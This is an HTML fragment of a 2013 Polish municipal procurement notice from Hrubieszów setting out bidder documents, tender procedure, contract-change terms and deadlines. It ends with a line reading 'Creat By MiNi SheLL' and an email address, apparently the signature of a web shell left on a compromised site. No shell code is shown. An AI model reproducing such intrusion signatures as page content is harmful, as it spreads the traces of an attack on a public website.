<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, stanowiący załącznik nr 1  do  SIWZ.
2.	W przypadku udziału podwykonawców - załącznik nr 5.
3.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji  niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia
4.	Dowód wpłaty wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zawarta umowa może ulec zmianie w szczególności w zakresie zapisów obejmujących: termin zakończenia realizacji przedmiotu zamówienia i wysokość wynagrodzenia za wykonanie przedmiotu zamówienia.
2.	 Zmiany umowy, o których mowa w ust. 1 dopuszczalne są w przypadku:
1)	gdy przedłuża się termin wykonania umowy o czas, na jaki zostanie przedłużony termin wykonania robót budowlanych wynikający z Aneksów zawartych                z Wykonawca robót budowlanych,  
2)	gdy zawiesza się  wykonanie umowy na okoliczność wniesienia odwołania,
3)	gdy z uwagi na konieczność realizacji robót dodatkowych lub zamiennych dojdzie do konieczności wstrzymania lub opóźnienia w terminie wykonania robót,
4)	gdy z uwagi na konieczność realizacji robót dodatkowych lub zamiennych zostanie rozszerzony zakres robót budowlanych,
5)	 zmian po zawarciu umowy przepisów prawa lub wprowadzenia nowych przepisów prawa lub zmiany lub wprowadzenia nowej bezwzględnie obowiązującej normy powodującej konieczność zmiany, modyfikacji lub odstępstwa w odniesieniu do wynagrodzenia,
6)	zmian organizacyjnych polegających w szczególności na zmianie, podwykonawców, grup wykonawców i innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, jakie posiadają podmioty zamieniane,
7)	wydania decyzji administracyjnych lub innych aktów władzy (decyzja władz publicznych, w tym oczekiwanie na nieprzewidziane wcześniej konieczne wyniki ekspertyz, wyrok sądu itp.) jeśli  ich wydanie nastąpiło na skutek okoliczności niezależnych od Wykonawcy,
8)	gdy konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami,
3.	Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza        o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania               o udzielenie zamówienia  publicznego,
4.	Zmiany treści Umowy związanej ze zmianą podatku VAT,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> umhrubieszow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta                         w Hrubieszowie -Wspólne Biuro Zarządzania Zaopatrzenia w wodę ul. 3-go Maja 15 tel. 084 6964262.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 13:00, miejsce: siedziba Zamawiającego (sekretariat), bądź przesłać na poniższy adres Zamawiającego: Gmina Miejska Hrubieszów ul. Mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie zadania pochodzi ze środków Europejskiego Instrumentu Sąsiedztwa i Partnerstwa w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013.
Priorytet 1.Wzrost konkurencyjności obszaru przygranicznego
Działanie 1.3. Poprawa dostępności regionu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com